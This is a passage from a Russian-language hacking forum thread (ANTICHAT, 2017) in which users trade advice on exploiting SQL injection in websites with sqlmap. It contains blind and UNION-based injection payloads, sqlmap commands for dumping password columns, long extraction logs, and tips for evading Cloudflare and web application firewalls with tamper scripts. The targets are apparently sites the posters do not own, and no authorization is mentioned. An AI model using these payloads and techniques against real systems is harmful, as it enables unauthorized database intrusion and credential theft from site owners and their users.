HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #521  
Старый 11.11.2017, 15:04
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от Muracha  
Muracha said:

Есть уязвимый сайт, который очень долго выводит и перебирает базы данных, таблицы, колонки.
Код:
Code:
arameter: fid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: &fid=2656 AND 5461=5461

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: &fid=2656 AND SLEEP(10)
---
Понимаю,что слепая иньекция, но можно ли увеличить скорость перебора?
Код:
Code:
[13:14:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:14:26] [INFO] retrieved:
[13:14:28] [WARNING] reflective value(s) found and filtering out
77
тут лучше тогда сразу искать нужные данные --search -T admin и т.д --search -C pass чтобы время не тратить. И потоков побольше , если можно --threads=15!

Может еще есть какие уязвимости, которые можно в Union или Error раскрутить
 
Ответить с цитированием

  #522  
Старый 15.11.2017, 15:06
Leendesst
Guest
Сообщений: n/a
Провел на форуме:
13749

Репутация: 0
По умолчанию

Есть Sql-inj. Выбивает такой error

Код:
Code:
Database_Exception [ 1064 ]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 [ SELECT id FROM `users` WHERE `id` = '1'' ]
Сайт под cloudflaer'ом, его в sql-map'е обойти труда не составило, но ошибку он не видит. Пробовал и так /user/1* и так /user/*. Помогите пожйлуйста.
 
Ответить с цитированием

  #523  
Старый 15.11.2017, 16:06
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от Leendesst  
Leendesst said:

Есть Sql-inj. Выбивает такой error
Код:
Code:
Database_Exception [ 1064 ]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 [ SELECT id FROM `users` WHERE `id` = '1'' ]
Сайт под cloudflaer'ом, его в sql-map'е обойти труда не составило, но ошибку он не видит. Пробовал и так /user/1* и так /user/*. Помогите пожйлуйста.
--level 3 попробуй, и возможно ещё куки нужны --cookie
 
Ответить с цитированием

  #524  
Старый 15.11.2017, 18:30
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Mysql:MariaDB

Type: AND/OR time-based blind

Если копать сайт вручную, он блокирует запросы при выборе user(), version(), database() - вручную таблицы выводит.

Используя sqlmap начинаются рождаться всякие птеродактили в ввиде ошибок:

Код:
Code:
[18:20:25] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[18:20:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
и

Код:
Code:
[18:19:32] [ERROR] invalid character detected. retrying..
Я голову сломал как обойти неправильную кодировку.

пробовал так:

Код:
Code:
--tables --fresh-queries --time-sec=30 --no-cast --fresh-queries
и так

Код:
Code:
--table - space2comment --tables --fresh-queries --time-sec=30 --fresh-queries --hex
Таблицы не видит из-за неправильной кодировки. Все же, как правильно составить запрос, чтобы прочитать их?
 
Ответить с цитированием

  #525  
Старый 15.11.2017, 18:48
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Взял запрос sqlmap и попытался модифицировать

Код:
Code:
-6576%20UNION%20ALL%20SELECT%20CONCAT(0x716a7a7071,0x4c754378766f69486f7a7270574e796c525666716c766b61524c435a644a4565566d73534a424348,0x716a766b71),71,table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=0x64623139353861%20--
Выводит пустую страницу, но при запросе

Код:
Code:
index.php?id=-6576%20UNION%20ALL%20SELECT%20CONCAT(0x716a7a7071,0x4c754378766f69486f7a7270574e796c525666716c766b61524c435a644a4565566d73534a424348,0x716a766b71),71,user()--%20giyw%20---
уже выдает результаты.

Как с помощью sqlmap или уже вручную составить запрос и вывести эти таблицы
 
Ответить с цитированием

  #526  
Старый 26.11.2017, 12:13
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Крутится на 80 порту демон "DataPalm"

sqlmap при таком запросе выдает несуразицу

Код:
Code:
-D BAZA -T TABLE -C password --dump --threads=10  --hex --parse-errors --cookie="cookies" --random-agent
.SpoilerTarget" type="button">Spoiler: text
Вот как выдернуть данные из колонки, чтобы они не были дичью?

[12:04:03] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[12:04:03] [INFO] fetching entries of column(s) 'password' for table 'documents' in database ''

[12:04:03] [INFO] fetching number of column(s) 'password' entries for table 'documents' in database ''

[12:04:03] [INFO] resumed: 2417

[12:04:03] [INFO] retrieving the length of query output

[12:04:03] [INFO] retrieved:

[12:04:04] [WARNING] reflective value(s) found and filtering out

[12:04:08] [INFO] retrieved:

[12:04:08] [INFO] resumed: \x08\x18

[12:04:08] [INFO] retrieving the length of query output

[12:04:13] [INFO] retrieved:

[12:04:13] [INFO] resumed: \x07\xffs_a3RD

[12:04:13] [INFO] retrieving the length of query output

[12:04:18] [INFO] retrieved:

[12:04:24] [INFO] retrieved:

[12:04:24] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically

[12:04:24] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

[12:05:10] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)

[12:05:12] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[12:05:15] [INFO] retrieved:

[12:05:15] [INFO] retrieving the length of query output

[12:05:19] [INFO] retrieved:

[12:05:25] [INFO] retrieved:

[12:05:28] [INFO] retrieved:

[12:05:28] [INFO] retrieving the length of query output

[12:05:32] [INFO] retrieved:

[12:05:39] [INFO] retrieved:

[12:05:45] [INFO] retrieved:

[12:05:45] [INFO] retrieving the length of query output

[12:05:50] [INFO] retrieved:

[12:05:56] [INFO] retrieved:

[12:06:00] [INFO] retrieved:

[12:06:00] [INFO] retrieving the length of query output

[12:06:09] [INFO] retrieved:

[12:06:20] [INFO] retrieved:

[12:06:25] [INFO] retrieved:

[12:06:25] [INFO] retrieving the length of query output

[12:06:30] [INFO] retrieved:

[12:06:35] [INFO] retrieved:

[12:06:39] [INFO] retrieved:

[12:06:39] [INFO] retrieving the length of query output

[12:06:43] [INFO] retrieved:

[12:06:50] [INFO] retrieved:

[12:06:54] [INFO] retrieved:

[12:06:54] [INFO] retrieving the length of query output

[12:06:59] [INFO] retrieved:

[12:07:05] [INFO] retrieved:

[12:07:09] [INFO] retrieved:

[12:07:09] [INFO] retrieving the length of query output

[12:07:13] [INFO] retrieved:

[12:07:22] [INFO] retrieved:

[12:07:26] [INFO] retrieved:

[12:07:26] [INFO] retrieving the length of query output

[12:07:30] [INFO] retrieved:

[12:07:35] [INFO] retrieved:

[12:07:39] [INFO] retrieved:

[12:07:39] [INFO] retrieving the length of query output

[12:07:44] [INFO] retrieved:

[12:07:50] [INFO] retrieved:

[12:07:55] [INFO] retrieved:

[12:07:55] [INFO] retrieving the length of query output

[12:08:01] [INFO] retrieved:

[12:08:08] [INFO] retrieved:

[12:08:13] [INFO] retrieved:

[12:08:13] [INFO] retrieving the length of query output

[12:08:13] [INFO] retrieved:
 
Ответить с цитированием

  #527  
Старый 04.12.2017, 12:33
johncena55
Guest
Сообщений: n/a
Провел на форуме:
2947

Репутация: 0
По умолчанию

Подскажите пожалуйста из-за чего может быть такая проблема?

.SpoilerTarget" type="button">Spoiler: error
[08:22:58] [INFO] fetching database names

[08:22:58] [INFO] fetching number of databases

[08:22:58] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

[08:23:16] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[08:24:57] [ERROR] invalid character detected. retrying..

[08:25:33] [ERROR] invalid character detected. retrying..

[08:26:10] [ERROR] invalid character detected. retrying..

[08:26:46] [ERROR] invalid character detected. retrying..

[08:27:23] [ERROR] invalid character detected. retrying..

[08:29:25] [ERROR] unable to properly validate last character value ('3')..

[08:30:02] [ERROR] invalid character detected. retrying..
 
Ответить с цитированием

  #528  
Старый 04.12.2017, 15:46
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от johncena55  
johncena55 said:

Подскажите пожалуйста из-за чего может быть такая проблема?
Spoiler: error
[08:24:57] [ERROR] invalid character detected. retrying..
еще часто ошибка когда у вас слабый интернет , высокий Ping (если через Wi-Fi) или что-то качается попутно, забивает траффик , тогда sqlmap не может верно расчитать время и начинает сыпать ошибки.
 
Ответить с цитированием

  #529  
Старый 04.12.2017, 16:09
johncena55
Guest
Сообщений: n/a
Провел на форуме:
2947

Репутация: 0
По умолчанию

Цитата:
Сообщение от man474019  
man474019 said:

--hex, --no-cast
Пробовал и то и другое...

Цитата:
Сообщение от grimnir  
grimnir said:

еще часто ошибка когда у вас слабый интернет , высокий Ping (если через Wi-Fi) или что-то качается попутно, забивает траффик , тогда sqlmap не может верно расчитать время и начинает сыпать ошибки.
Интернет хороший, первый раз столкнулся с такой проблемой..

Уже добирался до дб этого сайта, но было много ошибок, решил другой параметр пустить, теперь и тот и другой дает эти ошибки..
 
Ответить с цитированием

  #530  
Старый 04.12.2017, 16:29
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от johncena55  
johncena55 said:

Пробовал и то и другое...
Интернет хороший, первый раз столкнулся с такой проблемой..
Уже добирался до дб этого сайта, но было много ошибок, решил другой параметр пустить, теперь и тот и другой дает эти ошибки..
похоже на работу waf. Попробуйте тогда --tamper= и из списка https://github.com/sqlmapproject/sql.../master/tamper может получится обойти
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ